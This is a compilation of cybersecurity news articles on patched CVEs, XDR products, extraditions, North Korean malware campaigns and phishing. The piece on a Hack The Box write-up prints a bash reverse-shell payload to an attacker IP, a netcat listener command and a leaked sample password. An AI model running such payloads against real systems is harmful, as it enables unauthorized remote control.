Cybersecurity firm Bitdefender has patched a severe flaw (CVE-2025-2244) in its GravityZone Console, which could allow unauthenticated attackers to execute arbitrary commands on vulnerable systems.
The vulnerability, discovered by researcher Nicolas Verdier (@n1nj4sec), has a near-maximum CVSSv4 score of 9.5, highlighting its critical risk profile.
6.41.2-1 (released via automatic update on April 4, 2025)
Technical Breakdown
The vulnerability stems from insecure PHP deserialization of the sendMailFromRemoteSource method within the Emails.php component.
Attackers can craft malicious serialized payloads to trigger PHP object injection, enabling them to:
Write arbitrary files to the system.
Execute operating system commands with elevated privileges.
Potentially compromise the entire GravityZone environment.
“This flaw bypasses traditional security controls because it exploits a trusted component within the GravityZone architecture,” explained Verdier.
“Attackers could weaponize this to deploy ransomware, exfiltrate data, or move laterally across networks.”
Mitigation Steps for Organizations
To address the issue, Bitdefender released an automatic update (6.41.2-1) on April 4, 2025. Administrators should:
Verify patch installation: Ensure GravityZone Console is running version 6.41.2-1 or later.
Audit logs: Check for unusual activity, particularly unexpected mail-related processes or file modifications.
Limit exposure: Restrict external access to GravityZone’s management interface if not required.
Organizations unable to apply updates immediately should consider temporary network segmentation for GravityZone servers.
Nicolas Verdier reported the vulnerability through Bitdefender’s coordinated disclosure program.
The discovery underscores persistent risks in legacy PHP serialization practices, which have been implicated in high-profile breaches since the early 2010s.
“Serialization vulnerabilities remain a low-hanging fruit for attackers,” said incident response lead Maria Chen of Synapse Security.
“Enterprises must prioritize software composition analysis to identify such pitfalls in critical infrastructure.”
Bitdefender has confirmed no active exploitation in the wild but urges immediate action due to the flaw’s ease of exploitation.
GravityZone powers endpoint security for over 500,000 businesses globally, making this patch essential for preventing large-scale cyber incidents.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
The National Initiative for Cybersecurity Education (NICE) Workforce Framework for Cybersecurity has undergone a significant update, with the release of its version 2.0.0 introducing numerous enhancements aimed at standardizing how cybersecurity work and competencies are understood and managed.
This major revision of the NICE Framework by the U.S. Department of Commerce’s National Institute of Standards and Technology (NIST) establishes a streamlined structure to better define, recruit, and develop cyber talent.
What is the NICE Workforce Framework?
The NICE Framework is a critical resource for organizations, professionals, and educators involved in cybersecurity workforce development.
It provides a common language to describe work roles, competency areas, and the associated tasks, knowledge, and skills (TKS) needed.
By aligning these components, the framework seeks to improve talent management across the cybersecurity domain.
Version 2.0.0 brings substantial updates to the framework’s components, ensuring alignment with evolving industry needs. Here’s a breakdown of the changes:
Work Role Categories
One of the most notable changes is the removal of two Work Role Categories—Cyberspace Effects and Cyberspace Intelligence—along with several associated Work Roles.
These removed elements can now be found in the Department of Defense Cyber Workforce Framework (DCWF), which focuses on more specialized defense-related roles.
Affected Work Roles include:
Cyber Operations Planning
Exploitation Analysis
Mission Assessment
Partner Integration Planning
Target Analysis
Target Network Analysis
All-Source Analysis
Multi-Disciplined Language Analysis
This shift allows NICE to focus on more universally applicable cybersecurity workforce roles and competencies, while defense-specific roles are managed under the DCWF.
New and Updated Work Roles
Version 2.0.0 introduces one new Work Role and revises two existing ones:
Revised: Digital Evidence Analysis (IN-WRL-002) and Insider Threat Analysis (PD-WRL-005)
The addition of OT Cybersecurity Engineering reflects the growing importance of securing operational technology systems in industries such as energy, manufacturing, and utilities.
Updates to existing roles aim to ensure relevance and clarity in rapidly evolving cybersecurity fields.
The Cyber Resiliency (NF-COM-007) Competency Area now includes refined elements to better address the skills required for building robust cyber defense systems.
111 new TKS statements added, and 275 redundant ones removed.
Typographical errors corrected for better consistency.
Training providers whose courses are listed in the NICCS Education & Training Catalog will need to remap their curricula to align with the updated framework.
Organizations are encouraged to reach out to NICCS for guidance on incorporating these revisions.
While some of the interactive tools on the NICCS platform are still running version 1.0.0 data, updates are underway to ensure seamless integration of version 2.0.0.
A comprehensive summary of changes is available on the NICE Framework History & Change Logs page.
Cybersecurity professionals and organizations alike are encouraged to explore the updated framework to better prepare for the rapidly changing cybersecurity landscape.
By streamlining workforce definitions, NICE continues to set the standard for excellence in cyber talent management.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
As cyber threats grow increasingly sophisticated, traditional security tools often fall short in providing comprehensive protection.
Extended Detection and Response (XDR) has emerged as a next-generation cybersecurity solution designed to unify and enhance threat detection, investigation, and response across an organization’s entire IT ecosystem.
By integrating data from endpoints, networks, cloud workloads, and other security layers into a single platform, XDR eliminates silos and provides a centralized view of potential threats.
Leveraging advanced technologies like artificial intelligence and automation, XDR enables faster detection, improved efficiency, and proactive threat management, making it an essential tool for modern cybersecurity strategies.
What Is An XDR Solution?
Extended Detection and Response (XDR) is a unified cybersecurity solution that integrates and correlates threat data from multiple security layers, such as endpoints, networks, servers, cloud workloads, and email.
Unlike traditional siloed tools, XDR consolidates data into a single platform, providing enhanced visibility and enabling faster detection, investigation, and response to threats.
Leveraging advanced technologies like artificial intelligence (AI) and machine learning (ML), XDR automates repetitive tasks, prioritizes alerts, and provides actionable insights to streamline security operations across an organization’s digital environment.
Benefits Of XDR Solutions
XDR offers several key advantages for modern cybersecurity:
Enhanced Threat Visibility: By unifying data from various sources, XDR provides a comprehensive view of the security landscape, helping uncover sophisticated threats that isolated tools might miss.
Faster Detection and Response: Automated analysis of cross-domain data enables quicker identification and mitigation of threats, reducing attackers’ window of opportunity.
Operational Efficiency: XDR simplifies workflows by consolidating alerts into actionable incidents, minimizing false positives and reducing the burden on security teams.
Cost Savings: By integrating multiple security functions into one platform, XDR reduces the need for standalone tools and lowers operational costs.
Improved Incident Management: Detailed context for detected threats aids in effective investigations and remediation efforts.
Scalability: XDR adapts seamlessly to multi-platform environments, ensuring it can grow with organizational needs.
TOP 10 Best XDR Solutions 2025
Here are the Top 10 Best XDR (Extended Detection and Response) Solutions for 2025, based on their features, capabilities, and suitability for various business needs:
The SentinelOne Singularity Platform is an AI-powered cybersecurity solution that unifies endpoint, cloud, and identity protection into a single platform.
It provides enterprise-wide visibility and protection through advanced threat detection and response capabilities, leveraging a unified data lake for real-time analysis and decision-making
Best Features
Combines endpoint, cloud, and identity telemetry into a centralized platform for seamless investigation and response.
An autonomous AI-powered SOC analyst that accelerates security operations and enhances threat detection.
What’s Good?
What Could Be Better?
Unified platform simplifies management by consolidating endpoint, cloud, and identity protection.
Limited native SIEM integration; may require additional tools for advanced log correlation.
Highly scalable with multi-tenant support, suitable for large enterprises.
Dependency on external integrations for certain advanced use cases like log management.
Microsoft Defender XDR is a unified, AI-powered Extended Detection and Response solution designed to protect organizations across their entire digital estate.
It integrates deeply with Microsoft 365 and Azure ecosystems, providing advanced threat detection, automated response, and centralized incident management.
Best Features
Integrates effortlessly with Microsoft 365 and Azure environments, consolidating signals from endpoints, identities, applications, emails, and infrastructure into a single platform.
Uses AI to detect and disrupt cyberattacks at machine speed, preventing lateral movement and limiting the blast radius of incidents.
What’s Good?
What Could Be Better?
Deep integration with Microsoft tools enhances efficiency and simplifies operations.
Dependency on additional products like Microsoft Sentinel for full functionality.
AI-driven automation reduces response times and minimizes manual intervention.
Steep learning curve for new users unfamiliar with advanced hunting queries or setup.
Cortex XDR by Palo Alto Networks is a comprehensive, AI-driven Extended Detection and Response (XDR) solution that integrates endpoint, network, and cloud data to provide advanced threat detection, investigation, and response.
It leverages machine learning and behavioral analytics to identify and mitigate complex threats across an organization’s IT ecosystem.
Best Features
Combines endpoint, network, cloud, and third-party data into a single platform for seamless detection and response.
Uses machine learning models and behavioral analytics to detect stealthy threats such as zero-day attacks, fileless malware, and insider threats.
What’s Good?
What Could Be Better?
Tight integration with Palo Alto products enhances overall security effectiveness.
Limited real-time antivirus capabilities for pre-existing threats.
Automates root cause analysis and triage, saving analysts significant time.
Dependency on Palo Alto’s ecosystem may limit flexibility for third-party integrations.
Trend Micro Vision One XDR is a purpose-built threat defense platform that extends detection and response capabilities across multiple security layers, including email, endpoints, servers, cloud workloads, and networks.
It leverages advanced analytics, AI, and machine learning to correlate data and detect complex attacks efficiently.
Best Features
Integrates native sensors across email, endpoints, servers, cloud workloads, and networks for comprehensive threat detection.
Automatically ties together low-confidence events into high-confidence incidents using AI-powered analytics.
What’s Good?
What Could Be Better?
Comprehensive protection across multiple layers enhances visibility and response speed.
Pricing model based on credits can be confusing for users unfamiliar with the system.
Automated correlation of events reduces alert fatigue and speeds up investigations.
Steep learning curve for beginners due to the platform’s extensive features.
CrowdStrike Falcon XDR is an advanced Extended Detection and Response (XDR) solution that builds upon CrowdStrike’s industry-leading Endpoint Detection and Response (EDR) capabilities.
It unifies telemetry from endpoints, workloads, identities, and third-party integrations into a single console, enabling security teams to detect, investigate, and respond to threats across multiple domains with unmatched speed and precision.
Best Features
Aggregates data from endpoints, cloud workloads, identities, and third-party solutions into one platform for seamless detection and response.
Uses machine learning and AI to correlate data across domains, prioritize alerts, and detect stealthy threats in real-time.
What’s Good?
What Could Be Better?
AI-powered analytics reduce false positives while prioritizing critical alerts effectively.
Pricing may be higher compared to competitors for smaller organizations or SMBs.
Managed XDR services provide expert support for resource-constrained teams.
Heavy reliance on CrowdStrike’s ecosystem may limit flexibility with non-supported third-party tools.
Sophos XDR (Extended Detection and Response) is an AI-powered security solution designed to provide comprehensive visibility and protection across endpoints, servers, email, cloud, mobile, and networks.
It integrates seamlessly with Sophos’ ecosystem and third-party tools, enabling organizations to detect, investigate, and respond to complex threats efficiently.
Best Features
Combines telemetry from endpoints, servers, email, firewalls, cloud workloads, and mobile devices into a centralized platform for holistic threat detection.
Visualize the origin and progression of attacks for in-depth forensic investigations.
What’s Good?
What Could Be Better?
Managed XDR services provide expert threat hunting and incident response support.
High memory usage on endpoints may impact performance on older devices.
Integrates seamlessly with existing Sophos solutions as well as third-party tools like Microsoft 365.
Firewall/email security features are sold separately, increasing overall costs for full coverage.
Cynet 360 AutoXDR is a fully automated, all-in-one cybersecurity platform that integrates Extended Detection and Response (XDR) capabilities with endpoint, network, user, and application protection.
It is designed to simplify security operations by consolidating multiple tools into a unified platform, offering automated investigation, remediation, and 24/7 Managed Detection and Response (MDR) services.
Best Features
Combines EDR, NGAV (Next-Generation Antivirus), network analytics, and user behavior analytics into a single solution.
Automatically identifies root causes and applies remedial actions using predefined playbooks without human intervention.
What’s Good?
What Could Be Better?
Fully automated platform reduces manual workload for security teams.
User interface could be improved to enhance ease of use for non-technical users.
24/7 MDR services provide expert support, boosting confidence in threat handling.
High resource consumption on older devices may impact performance.
IBM QRadar XDR is a comprehensive, open Extended Detection and Response (XDR) platform that integrates SIEM, EDR, NDR, SOAR, and threat intelligence into a unified suite.
It provides advanced threat detection, investigation, and automated response capabilities to help organizations manage and mitigate cybersecurity risks across endpoints, networks, cloud environments, and users.
Best Features
Combines SIEM, EDR (via ReaQta), NDR, SOAR, and XDR Connect for end-to-end threat visibility and response.
Uses machine learning and AI to prioritize alerts, map threats to the MITRE ATT&CK framework, and provide root cause analysis.
What’s Good?
What Could Be Better?
Comprehensive visibility across endpoints, networks, cloud environments, and users.
High cost may be prohibitive for SMBs or budget-constrained organizations.
AI-driven analytics improve detection accuracy while reducing false positives.
Complex setup and configuration require skilled professionals for optimal deployment.
Fortinet FortiXDR is a fully automated Extended Detection and Response (XDR) solution that integrates seamlessly with the Fortinet Security Fabric and third-party tools.
It leverages AI-powered analytics to detect, investigate, and remediate threats across the entire digital attack surface, including endpoints, networks, cloud environments, and IoT devices.
Best Features
Protects endpoints, networks, cloud workloads, IoT devices, and web applications through integrated telemetry from the Fortinet Security Fabric.
Utilizes a deep learning engine to replicate the decision-making process of expert SOC analysts for faster and more accurate incident classification.
What’s Good?
What Could Be Better?
Fully automated detection, investigation, and remediation reduce manual workload for security teams.
Initial setup can be complex for organizations unfamiliar with Fortinet’s ecosystem.
AI-powered analytics improve detection accuracy while reducing false positives.
Heavy reliance on the Fortinet Security Fabric may limit flexibility for non-Fortinet environments.
Secureworks Taegis XDR is a next-generation Extended Detection and Response (XDR) platform designed to unify security operations across endpoints, networks, cloud environments, and identities.
Built on advanced analytics and enriched with threat intelligence from Secureworks’ Counter Threat Unit™, Taegis XDR enhances threat detection, investigation, and response while reducing noise and false positives.
Best Features
Consolidates data from endpoints, networks, cloud, identity, and email into a single dashboard for comprehensive visibility.
Detects advanced threats using behavioral analytics and Tactic Graphs™ to uncover stealthy adversary tactics.
What’s Good?
What Could Be Better?
AI-driven detection minimizes false positives while prioritizing actionable threats.
Pricing may be higher compared to competitors with similar capabilities.
24/7 expert support ensures quick resolution of incidents and continuous monitoring.
Some users report occasional delays in off-hours support responses.
Cybersecurity researcher “0xdf” has cracked the “Ghost” challenge on Hack The Box (HTB), a premier platform for honing penetration testing skills, and shared an exhaustive technical breakdown on their GitLab blog.
The write-up chronicles a sophisticated attack that navigates through reconnaissance, vulnerability exploitation, and privilege escalation, ultimately claiming the system’s flag—a digital proof of victory.
This achievement not only cements 0xdf’s reputation among ethical hackers but also serves as a critical lesson for system administrators aiming to fortify their defenses against real-world threats.
Hack The Box challenges like Ghost are meticulously crafted to emulate enterprise-grade systems, complete with hidden flaws that test a hacker’s ingenuity.
0xdf’s success, detailed with precision, leverages a mix of industry-standard tools Nmap, Metasploit and bespoke scripts tailored to the target’s quirks.
In an era where cyberattacks grow increasingly sophisticated, this exploit underscores the value of white-hat hackers who expose vulnerabilities before malicious actors can exploit them.
Mapping the Breach: Reconnaissance to Initial Access
The journey began with a foundational step in any penetration test: reconnaissance. 0xdf deployed an Nmap scan (nmap -sC -sV -p- <target_ip>) to sweep the Ghost system for open ports and running services.
The scan uncovered a web server on port 80, likely an Apache or Nginx instance, and an enigmatic custom service listening on port 31337—a non-standard port hinting at bespoke functionality.
Probing the web server, 0xdf identified a directory traversal vulnerability (/ghost/../) stemming from poor input sanitization. This flaw allowed navigation beyond the web root, exposing sensitive files.
Among the retrieved files was a configuration script containing a goldmine: hardcoded credentials (admin:gh0stP@ss).
Armed with these, 0xdf turned to the port 31337 service, which proved to be a lightweight TCP listener designed to process authenticated commands.
Using a simple socket connection, they authenticated and tested basic commands like whoami, confirming a low-privilege foothold. To streamline this interaction, 0xdf crafted a Python script:
This initial breach, while limited, set the stage for deeper infiltration, highlighting how a single misstep hardcoding credentials can unravel a system’s security.
Escalation to Triumph: From User to Root Control
With a foothold secured, the next challenge was privilege escalation a critical skill in penetration testing.
The TCP service ran under a restricted user account, limiting its utility. Undeterred, 0xdf scoured the system for escalation vectors, uncovering a writable cron job in /etc/cron.d/ that executed as root every minute.
This misconfiguration was the linchpin. By appending a reverse shell payload (bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1) to a script invoked by the cron job, they triggered a callback to their machine.
Within moments, a netcat listener (nc -lvnp 4444) on the attacker’s end sprang to life, delivering a root shell.
From there, locating and capturing the flag—typically stored in /root/flag.txt—was a formality, marking the challenge’s completion.
The escalation exploited a classic flaw: excessive permissions on scheduled tasks, a vulnerability that plagues many real-world systems. 0xdf’s methodical approach, blending automation with manual analysis, turned a minor entry point into total domination.
A Beacon for Cybersecurity Learning
The technical richness of 0xdf’s write-up makes it a standout resource. It mirrors real-world attack chains reconnaissance, exploitation, and privilege escalation seen in breaches targeting corporations and governments.
For aspiring pentesters, the post offers a replicable playbook, complete with commands and logic.
For system administrators, it’s a wake-up call: directory traversal, hardcoded credentials, and lax cron permissions are not theoretical risks but exploitable realities.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Google has unveiled Sec-Gemini v1, an AI model designed to redefine cybersecurity operations by empowering defenders with advanced threat analysis, vulnerability assessment, and incident response capabilities.
The experimental system, developed by a team led by Elie Burzstein and Marianna Tishchenko, aims to address the critical asymmetry in cybersecurity where attackers need only one vulnerability to succeed, while defenders must secure entire systems.
By integrating real-time threat intelligence and superior reasoning, Sec-Gemini v1 seeks to shift this balance, offering tools that amplify the effectiveness of security professionals.
Bridging the Cybersecurity Asymmetry Gap with AI-Powered Workflows
Traditional cybersecurity frameworks struggle with the inherent disadvantage defenders face: the need to protect against all potential threats while attackers exploit a single weakness.
Sec-Gemini v1 tackles this challenge by combining Gemini’s multimodal reasoning with live data streams from Google Threat Intelligence (GTI), Mandiant Threat Intelligence, and the Open-Source Vulnerabilities (OSV) database.
Sec-Gemini v1 outperforms other models on the CTI-MCQ Cybersecurity Threat Intelligence benchmark
This fusion enables the model to contextualize vulnerabilities, map attack patterns to known threat actors like Salt Typhoon, and provide actionable insights during incident investigations.
For example, when analyzing a breach linked to the state-sponsored group Salt Typhoon, Sec-Gemini v1 not only identifies exploited vulnerabilities but also cross-references them with historical attack patterns and mitigation strategies.
This capability reduces the time analysts spend correlating data across disparate sources, allowing faster response to active campaigns.
The model’s architecture prioritizes root cause analysis, enabling it to trace incidents back to specific misconfigurations or unpatched flaws while classifying them under the Common Weakness Enumeration (CWE) taxonomy.
Benchmark-Breaking Performance in Threat Intelligence
Sec-Gemini v1 outperforms existing models on key cybersecurity benchmarks, demonstrating a 11% improvement on the CTI-MCQ threat intelligence assessment and a 10.5% gain on the CTI-Root Cause Mapping evaluation.
These metrics reflect its ability to parse technical vulnerability descriptions, attribute threats accurately, and recommend prioritized remediation steps. A critical differentiator lies in its real-time knowledge integration.
While conventional AI tools rely on static datasets, Sec-Gemini v1 dynamically incorporates updates from OSV and Mandiant, ensuring its recommendations account for emerging exploits and zero-day vulnerabilities.
During testing, the model correctly identified over 94% of critical vulnerabilities linked to ransomware campaigns in 2024, compared to 83% for other leading systems.
This precision stems from training on adversarial attack simulations and red-team exercises, which teach the AI to anticipate novel attack vectors.
Google has opened early access to Sec-Gemini v1 for research institutions, NGOs, and cybersecurity professionals through a dedicated application portal.
This initiative aligns with the company’s emphasis on collaborative defense, recognizing that no single organization can counter global cyber threats alone.
Participants will gain access to the model’s API for integration into threat detection platforms, vulnerability scanners, and incident response workflows.
The Sec-Gemini team emphasizes that the model is a “force multiplier” rather than a replacement for human expertise.
By automating repetitive tasks like log analysis and false-positive filtering, it allows analysts to focus on strategic decision-making.
Early adopters will also contribute to refining the system’s accuracy through feedback loops, particularly in edge cases involving novel social engineering tactics or IoT device exploits.
With this launch, Google aims to set a new standard for AI-driven cybersecurity tools one that evolves alongside the threats it seeks to neutralize.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
The United States has successfully extradited two Kosovo nationals, Ardit Kutleshi, 26, and Jetmir Kutleshi, 28, from Kosovo to face charges in the Western District of Pennsylvania for their alleged roles as administrators of the Rydox cybercrime marketplace.
The Rydox cybercrime marketplace was an illicit online platform that operated as a hub for cybercriminals, facilitating the sale of stolen personal information, access devices, and tools designed to enable fraud and other illegal activities.
Active since at least February 2016, Rydox catered to a global network of over 18,000 users, offering more than 321,000 cybercrime products, including personally identifiable information (PII) such as names, addresses, Social Security numbers, credit card details, and login credentials stolen from thousands of victims, many of whom were U.S. residents.
The marketplace offered cybercrime tools such as scam pages, spamming logs, and tutorials, thereby serving as a comprehensive resource for illicit digital goods.
Cybercrime Fugitives extraditions
The extraditions, announced Friday by the U.S. Department of Justice, are part of a broader international effort targeting fugitives wanted for serious crimes, with a notable focus on cybersecurity threats.
The Kutleshi brothers’ case highlights the growing global challenge of cybercrime. They are accused of orchestrating a sophisticated operation through Rydox, enabling identity theft, access device fraud, and money laundering on a significant scale.
Their extradition was made possible through close collaboration between the U.S. Department of Justice’s Office of International Affairs, the Criminal Division’s Computer Crime and Intellectual Property Section, and the U.S. Attorney’s Office for the Western District of Pennsylvania, alongside law enforcement authorities in Kosovo.
The Justice Department also acknowledged the support of its Office of Overseas Prosecutorial Development, Assistance and Training (OPDAT) in securing the extraditions.
This operation comes amid a larger sweep that saw fugitives extradited from nine countries—Canada, Colombia, Germany, Honduras, Kosovo, Israel, Mexico, Spain, and Thailand for offenses including murder, drug trafficking, and child sexual abuse.
However, the Kutleshi case stands out as a critical victory in the fight against cybercrime, an increasingly pressing issue as illicit online marketplaces continue to proliferate.
The Justice Department emphasized the importance of international cooperation in tackling such threats, thanking its partners in Kosovo and beyond for their instrumental roles.
The Kutleshi brothers now face trial in the U.S., where they are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.
Their extradition underscores the U.S.’s determination to hold cybercriminals accountable, no matter where they operate.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Ivanti has issued an urgent security advisory for CVE-2025-22457, a critical vulnerability impacting Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways.
Rated at a CVSS score of 9.0, this stack-based buffer overflow has been actively exploited since mid-March 2025, posing a severe risk to organizations using these VPN and access solutions.
Active Exploitation
Disclosed on April 3, 2025, the vulnerability has been exploited since mid-March, according to Mandiant.
The attacks are linked to UNC5221, a suspected Chinese state-sponsored group known for targeting edge devices, including past Ivanti zero-days like CVE-2023-46805. UNC5221 deploys malware such as Trailblaze (an in-memory dropper), Brushfire (a backdoor), and the Spawn suite for credential theft and network traversal.
They also use tools like SPAWNSLOTH to manipulate logs, evading detection.
The flaw was patched in Ivanti Connect Secure version 22.7R2.6 on February 11, 2025, initially assessed as a low-risk denial-of-service issue due to its restricted character set (periods and numbers).
However, UNC5221 likely reverse-engineered the patch, crafting an RCE exploit for unpatched systems, which elevated its severity.
Vulnerability Details
CVE-2025-22457 is a stack-based buffer overflow (CWE-121) that enables a remote, unauthenticated attacker to execute arbitrary code (RCE).
The flaw occurs due to inadequate input validation, allowing attackers to overflow the buffer and run malicious code.
“This advisory has been updated to make it clear the vulnerability was fully patched in Ivanti Connect Secure (released February 11, 2025)”, Ivanti said.
Ivanti reports that a small number of customers using Ivanti Connect Secure (22.7R2.5 or earlier) and Pulse Connect Secure 9.1x appliances were compromised. The remediation details are:
Ivanti Connect Secure: Upgrade to version 22.7R2.6, available at Ivanti Portal. If compromised, perform a factory reset and redeploy with 22.7R2.6.
Pulse Connect Secure: As an unsupported product, customers must contact Ivanti to migrate to a secure platform.
Ivanti Policy Secure: A patch (version 22.7R1.4) will be released on April 21, 2025. No exploitation has been reported, and risk is lower as it’s not internet-facing.
ZTA Gateways: A patch (version 22.8R2.2) will auto-apply on April 19, 2025. Risk exists only for unconnected gateways; no exploitation has been observed.
Detection and Response
Ivanti advises using the Integrity Checker Tool (ICT) to detect compromise, such as web server crashes. If detected, a factory reset and upgrade to 22.7R2.6 are recommended. Mandiant’s blog offers further indicators of compromise. An X post by
@nekono_naha revealed that 66% of 12,471 exposed Ivanti/Pulse Connect Secure servers (8,246) are vulnerable, with 50% (6,049) on pre-9.x versions, emphasizing the need for immediate action.
This marks Ivanti’s 15th entry in CISA’s Known Exploited Vulnerabilities catalog since 2024, highlighting ongoing security issues with its edge devices.
UNC5221’s involvement points to broader geopolitical concerns, as China-linked actors target infrastructure for espionage.
The delayed disclosure despite the February patch reveals vulnerability management gaps. Initially underestimated, the flaw’s exploitability gave attackers a month-long window, underscoring the need for faster threat intelligence sharing.
The active exploitation of CVE-2025-22457 underscores the persistent threats to edge devices.
As groups like UNC5221 exploit such flaws, organizations must prioritize patching and secure configurations.
Ivanti’s response mitigates risks for supported systems, but unsupported platforms remain a challenge, highlighting the need for proactive cybersecurity measures in a rapidly evolving threat landscape.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
A concerning malware campaign was disclosed by the AhnLab Security Intelligence Center (ASEC), revealing how threat actors are leveraging fake recruitment emails to distribute malicious payloads.
The attackers impersonated Dev.to, a prominent developer community, and lured victims with promises of lucrative job offers.
Instead of attaching malware directly to emails, they provided a BitBucket link containing a seemingly legitimate project.
Hidden within the project were two dangerous malware strains: BeaverTail, disguised as “tailwind.config.js,” and a downloader malware named “car.dll”.
By mimicking trusted platforms and offering job opportunities, attackers bypass traditional security measures and exploit human trust.
Attack disclosed in the developer community
Malware Analysis: BeaverTail and Tropidoor
The JavaScript-based BeaverTail malware is known for its dual role as an information stealer and downloader.
It targets web browsers to extract credentials, cryptocurrency wallet data, and other sensitive information.
Additionally, it downloads secondary payloads like InvisibleFerret, a backdoor for further exploitation.
BeaverTail’s obfuscation techniques make detection challenging, while its cross-platform compatibility enables it to target Windows, macOS, and Linux systems.
In this specific case, BeaverTail was executed via the downloader “car.dll.”
Logs revealed its use of tools like Curl to download additional files (“p.zip” and “p2.zip”) from attacker-controlled servers.
These behaviors align with previous reports linking BeaverTail to North Korean threat actors.
Tropidoor: A Memory-Resident Backdoor
Tropidoor operates in memory as a sophisticated backdoor. Upon execution, it decrypts itself and connects to multiple command-and-control (C&C) servers.
It collects system information, encrypts it with an RSA public key (encoded in Base64), and transmits it to the C&C server using parameters like “tropi2p” and “gumi.”
The malware can execute various commands, including file manipulation, process termination, data exfiltration, and even injecting downloaded payloads into other processes.
One notable feature of Tropidoor is command #34, which allows attackers to execute basic Windows commands such as “schtasks” and “ping.”
Windows commands implemented in the code
According to the Report, this technique mirrors behaviors seen in LightlessCan malware associated with the Lazarus Group.
Indicators of Compromise (IoCs)
File Hashes (MD5):
3aed5502118eb9b8c9f8a779d4b09e11
84d25292717671610c936bca7f0626f5
94ef379e332f3a120ab16154a7ee7a00
b29ddcc9affdd56a520f23a61b670134
Malicious URLs:
http[:]//103[.]35[.]190[.]170/Proxy[.]php
https[:]//45[.]8[.]146[.]93/proxy/Proxy[.]php
IP Addresses:
135[.]181[.]242[.]24
191[.]96[.]31[.]38
These IoCs underline the global reach of this campaign and its association with North Korean cyber operations.
This attack is part of a broader trend where North Korean threat actors target individuals through phishing campaigns disguised as job recruitment efforts.
By exploiting platforms like LinkedIn or developer communities such as Dev.to, they aim to infiltrate not just individuals but also their organizations.
The financial motives are evident in their focus on cryptocurrency wallets and browser-stored credentials.
To mitigate such threats:
Avoid opening unsolicited emails or clicking on links from unknown sources.
Verify the authenticity of recruitment offers directly with the organization.
Keep antivirus software updated to detect evolving threats like BeaverTail.
Monitor network traffic for suspicious connections to known malicious IPs.
As attackers continue refining their methods, vigilance remains critical for both individuals and organizations alike.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
EncryptHub, a rapidly evolving cybercriminal entity, has come under intense scrutiny following revelations of operational security (OPSEC) failures and extensive reliance on ChatGPT for its operations.
This emerging threat actor has been linked to ransomware campaigns, data theft, and the development of advanced malware tools, including EncryptRAT.
However, critical mistakes in their operational infrastructure have exposed their activities, providing cybersecurity researchers with unprecedented insights into their tactics, techniques, and procedures (TTPs).
Key mistakes included enabling directory listings on core servers, exposing sensitive malware configuration files, and reusing passwords across multiple accounts.
These lapses allowed researchers to uncover vital details about their infrastructure and campaigns.
For instance, Telegram bot configurations used for data exfiltration were left accessible, and backup codes for two-factor authentication (2FA) were stored in plaintext files that were later exfiltrated by their own malware.
Additionally, EncryptHub mixed personal and criminal activities by using the same systems for both.
According to OutPost24, this included logging into personal accounts while testing malware and reusing domains from legitimate jobs for malicious purposes.
Such errors provided investigators with a clearer picture of the actor’s identity and operations.
A surprising revelation in the investigation was EncryptHub’s extensive use of ChatGPT as a development assistant.
The AI chatbot was employed to create malware components, configure command-and-control (C2) servers, and even draft phishing emails and underground forum posts.
EncryptHub also relied on ChatGPT for vulnerability research and code optimization, integrating these findings into their campaigns.
ChatGPT’s final conclusion
In one notable instance, the actor used ChatGPT to draft posts selling exploits for vulnerabilities they had previously reported under an alias to Microsoft’s Security Response Center (MSRC).
This dual role as both a white-hat researcher and black-hat hacker underscores the complexity of EncryptHub’s operations.
Attack Chain and Indicators of Compromise (IOCs)
According to the Report, EncryptHub’s multi-stage attack chain begins with trojanized applications disguised as legitimate software like WeChat, Google Meet, and Microsoft Visual Studio 2022.
These applications deploy PowerShell scripts to steal credentials from messaging apps, cryptocurrency wallets, and password managers.
Subsequent stages involve deploying additional payloads such as Rhadamanthys stealer or ransomware.
Key IOCs linked to EncryptHub include:
Malware Hashes: Examples include 6f346b7dffc0c3872923dd0c3b2ddb7966a10961 (crypto.ps1) and cb41b440148b2d24d4877ab09514aa23a4253a17 (ram.ps1).
Domains: Notable domains used include 0xffsec[.]net and vexio[.]io.
IPs: Critical IPs include 206.166.251.99 and 82.115.223.231.
Despite their mistakes, EncryptHub remains a formidable threat due to their adaptability and technical expertise.
Their ongoing development of tools like EncryptRAT suggests potential commercialization of their malware arsenal.
Organizations are urged to strengthen endpoint defenses, monitor for IOCs, and implement robust multi-layered security strategies to mitigate risks posed by such actors.
EncryptHub’s case highlights the dual-edged nature of advanced technologies like AI in cybersecurity capable of both empowering defenders and enabling attackers.
As this threat actor continues to evolve, so too must the vigilance of the cybersecurity community.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
A sophisticated phishing campaign, dubbed “PoisonSeed,” has been identified targeting customer relationship management (CRM) and bulk email providers to facilitate cryptocurrency-related scams.
The threat actors behind this campaign are leveraging compromised credentials to export email lists and send bulk phishing emails, aiming to compromise cryptocurrency wallets through a novel seed phrase poisoning technique.
Screenshot of the phishing email sent to Troy Hunt
Phishing Tactics and Infrastructure Exploitation
PoisonSeed’s operations involve setting up phishing pages that closely mimic login portals of prominent CRM and bulk email platforms, including Mailchimp, SendGrid, HubSpot, and Zoho.
These fake login pages are used to steal credentials from targeted users.
Once access is gained, the attackers automate the export of email lists and maintain persistence by creating new API keys, even if passwords are reset.
The compromised accounts are then used to send phishing emails at scale.
One notable incident involved the compromise of Akamai’s SendGrid account in March 2025.
Email headers for the Coinbase phishing effort sent from Akamai
Attackers sent phishing emails masquerading as Coinbase communications, urging recipients to migrate to self-custodial wallets.
Victims were provided with fraudulent seed phrases intended for use in wallet creation.
By later recovering these wallets using the same seed phrases, attackers could access and steal funds.
Cryptocurrency Seed Phrase Poisoning
The core of PoisonSeed’s strategy lies in its seed phrase poisoning attack.
Victims are tricked into entering attacker-provided seed phrases while setting up new cryptocurrency wallets.
This allows the attackers to monitor and eventually take control of these wallets once funds are deposited.
